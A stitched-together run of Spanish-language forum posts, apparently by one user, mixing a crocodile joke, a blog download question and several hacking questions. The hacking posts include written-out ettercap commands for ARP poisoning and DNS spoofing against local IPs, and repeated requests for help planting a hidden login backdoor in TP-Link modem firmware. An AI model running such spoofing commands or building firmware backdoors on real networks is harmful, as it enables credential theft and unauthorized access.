He creado un blog en google, por lo que debo asegurar unos boletos de la UAG para que las descarguen del blog oficial de ésta Universidad varios alumnos. Así que tengo un problema entre manos, no manejo php.

Les plantearé mi perspectiva.
Trato de hacer un código para insertarlo en el blog o en un archivo y así tener un gestor de descargas (dentro del blog, sin tener que mandarlo a mega, mediafire, etc). Por lo que cuando el chico o la chica le dé click a la imágen, se descarge el archivo. Que sea en PHP.

(Por supuesto que investigué pero no lo consigo. De no hacerlo me meteré en menudo problema  )

Un Cordial Saludo  

Hola a todos 

Ayer vi una pelicula, en donde un sujeto para acaparar la atención de él, activa las alarmas de los autos con un prototipo de aparato.
Por lo qué me entró esta duda, ¿Existe ese aparato para poder activar las alarmas de los carros?, no lo vean como una maldad, si no como una vulnerabilidad que está al alcance de cualquier persona.

Siempre que un ruido grande se escucha, las alarmas de los carros se activan, por ejemplo, de un rayo, el viento, el ladrido de varios perros, etc....
Supogo que el aparato lanza una onda en Hz que debería ser la onda maś alta pero a la vez baja sin alterar a las personas de alguna manera.
Es una hipótesis, así que desconozco como funciona.

Un Cordial Saludo 

Hola colegas  

Hasta ahora he tenido solo la dificultad de encontrar un sistema VxWorks SDK, por lo que me he retrasado en mis proyectos.

¿Alguién sabe dónde me puedo descargar, comprar, encontrar, lo que sea que lo pueda optener VxWorks SDK?

Sé que no está disponible, pero hay quienes tienen esa maña de encontrar hasta lo que no está, a esos les llamo grillos xD.

Un Cordial Saludo  

Hola a todos 

Estoy en un proyecto que tengo desde hace meses atorado en mi cabeza. Y me pregunto cómo editar con alguna herramienta el firmware de un módem, no quiero hacer nada que pase los límites de la ética.
Quiero ponerle una puerta trasera al firmware para entrar a el sistema de otra manera, no os preocupeís, que es mi módem  . Pero el problema es que está en lenguaje ensamblador, no tengo conocimientos de ensamblador, manejo C, C ++, python, y algo de java como de MySQL, pero nomás.

Quisiera que me echaran la mano para lograr éste proyecto, de aquellos que saben como hacerlo.

Un Cordial Saludo 

Hola a todos  ,

Hace un par de horas estaba leyendo la historia de éste sitio, por lo que me pareció cada vez más interesante, hasta que me quedé leyendo todo. Pero sin envargo, me quedé con varias dudas.

Y éstas son para ti el brujo.
En aquel entonces, ¿cómo parabas un DDOS?, ¿Qué sistema de publicidad usaste?, ¿Fue legal usar ese sistema de publicidad aún cuando las víctimas no sabían que eran usadas para que el sitio ganara dinero?

Espero no ser muy directo con tigo y que no te lo tomes a mal, pero cuando algo me queda de duda, soy muy preguntón  .

Un coridal saludo 

Que onda,

He tratado de comprender cada día el funcionamiento de los molestos ataques de DNS Spoofing HTTP en las redes locales para extraer contraseñas o limitar el internet.
Sin envargo no puedo comprender la herramienta de cazador cazado que ejecuta:
Un Script Lighttpd
Ettercap auto add
Resoluciones DNS con Ettercap

Es confuso que estas herramientas automatizadas lo hacen desde otro punto de vista al que conozco.
Bueno al grano, he tratado de parar estos ataques en redes escolares donde no tengo acceso al módem, ni resetearlo con un clip o cambiarle la contraseña.
Así que para que no me pillen trato de evadir este ataque usando un tor.
Por desgracia estoy aprendiendo su funcionamiento.
En los laboratorios de mi caza (en el sofá frente al televisor.... ), he hecho unas pruebas con 2 lap's y bueno, como ven la de .103 es mia, pero cuando ejecuto el ataque con la otra lap que es la .100, no se puede visualizar el ataque de spoof. Lo que trato de hacer es un portal cautivo manualmente, como el de cazador cazado, pero no me sale. Donde redireccione los paquetes a un solo sitio HTTP.

echo -A 192.168.1.103 > /usr/local/share/ettercap/etter.dns

ettercap -T -q -P autoadd -M arp // // -i wlan0 & ettercap -T -q -P dns_spoof -i wlan0

ettercap -Tq -P dns_spoof -M arp:remote /192.168.1.1/ /192.168.1.100/


Lo único que quiero es conocer su funcionamiento y sus comandos para continuar investigando tanto como experimentado, para aquellos que conocen la temática me lo pueden explicar por favor, Gracias  !

Estoy en E.U.A y ni cuenta me dí que era el 4 de Julio porque venía de un concurso de baloncesto internacional de la UAG y me quedé dormido todo el día, pero al grano xD.

Capacidad a Prueba.

Un millonario promueve una fiesta en una de sus mansiones, y en determinado momento, pide silencio y la música para, y dice, mirando hacia la piscina donde criaba cocodrilos australianos....,el que logre cruzarla y salir vivo al otro lado, ganará todos mis carros.... ..

Alguien se atreve??????

Espantados, los invitados permanecen en silencio y el millonario insiste: El que se lance a la piscina, logre cruzarla y salir vivo al otro lado, ganará todos mis carros y mis aviones...

Alguien se atreve??

El silencio impera, y una vez mas, ofrece: El q ue se lance a la piscina, logre cruzarla y salir vivo al otro lado ganará todos mis carros, mis aviones y mis mansiones...... En este momento, alguien salta a la piscina. La escena es impresionante... Una lucha intensa, el hombre se defiende como puede, agarra la boca de los cocodrilos con pies y manos, tuerce la cola de los reptiles..... . DIOS MIO... Mucha violencia y emoción. Parecía una película de COCODRILO DUNDEE!!!

Después de algunos minutos de terror y pánico, sale el valiente hombre, lleno de arañazos, hematomas y casi muerto. El millonario se aproxima, lo felicita y le pregunta: Donde quiere que le entregue los carros??????' Gracias pero no quiero sus carros... Sorprendido, el
millonario pregunta: Y los aviones, donde quiere que se los entregue????

Gracias, pero no quiero sus aviones.... Extrañado por la reacción del hombre, el millonario pregunta:

-Y las mansiones????????????? Yo tengo una bella casa, no necesito de las suyas. Puede quedarse con ellas....No quiero nada que sea suyo...

Impresionado, el millonario pregunta: Pero si Ud. no quiere nada de lo ofrecido, que quiere entonces???? Y el hombre le respondió muy irritado: Encontrar al hijo de p**a que me empujó a la piscina......!!!!!!

Hace unos días circulaba la noticia del descubrimiento por parte de los amigos de WebSec (@_hkm, @calderpwn y @LightOS) de una gran cantidad de routers en México con puertas traseras y cuentas ocultas que permiten a cualquier persona acceder con un usuario privilegiado a la configuración de los routers hogareños de miles de Mexicanos.

El registro todavia es obligatorio y no esta disponible al publico pero pude acceder como betatester y como soy usuario de RouterPWN, Mac2WepKey, HHG5XX e y se la calidad de las herramientas publicadas por estos "gueyes" me puse en la tarea de probar la herramienta y quede sorprendido con su facilidad y rapidez.

La herramienta esta desarrollada en Java para permitir su ejecución en cualquier sistema operativo (yo lo probé en Mac OS X), y al iniciar nos hace varias preguntas , como el tipo de vulnerabilidades a buscar y el rango de IPs que quieres auditar. .....
URL: http://www.dragonjar.org/ya-revisaste-si-tu-router-tiene-puertas-traseras.xhtml

Que onda,

Colegas, tengo un problema y no puedo resolverlo, asi' que para empezar no domino el lenguaje ensamblador, porque sabemos que es el ma's difi'cil de todos los lenguajes de programacio'n (para mi xD) . Entonces necesito su ayuda.

Necesito editar este firmware y ponerle un HTML para darle una instuccio'n de login 2 para mi mo'dem (basicamente una puerta trasera):http://www.tp-link.com/en/support/download/?model=TL-WR541G&version=V7#tbl_j

Aca les dejo una info, por si quieren ver si su mo'dem es vulnerable con puertas traseras: http://www.dragonjar.org/ya-revisaste-si-tu-router-tiene-puertas-traseras.xhtml

Bueno amigos, de antemano gracias

Que onda,

Colegas, he venido a plantearles un par de preguntillas a aquellos programadores profesionales y muy bien experimentados, acerca de el funcionamiento de un firmware del módem tp-link (su código de programación) que yaa había posteado en el título. Tambén agregando, de cómo puedo modificar algunas cosas y que aún siga funcionando, como por ejemplo ponerle una cadena de html para poner una opción yaa sea oculta o no (en el url que solo aparezca la página o la terminal, pero no aparezca una opción como la que estamos acostumbrados a clickear que nos lleve a esa página o la terminal, o ambas, que aparezca una cadena de url y una opción para clickear, si me explico, no?).
Agregando, con qué herramienta puedo modificarlo manualmente, y bajo que programación está, para aquellos que yaa sepan, (yoo no he averiguado bajo que programación está, porque no lo he sabido editar, soy un poco novato en la programación editando este tipo de firmwares, si he editado de celulares, pero de módems no )
Por favor no me cuestiones, solo respondeme lo que te pido,  ni me critiques por mi nobateza xD.
Si te molesta por favor no publiques nada.

Bueno, de ante mano gracias.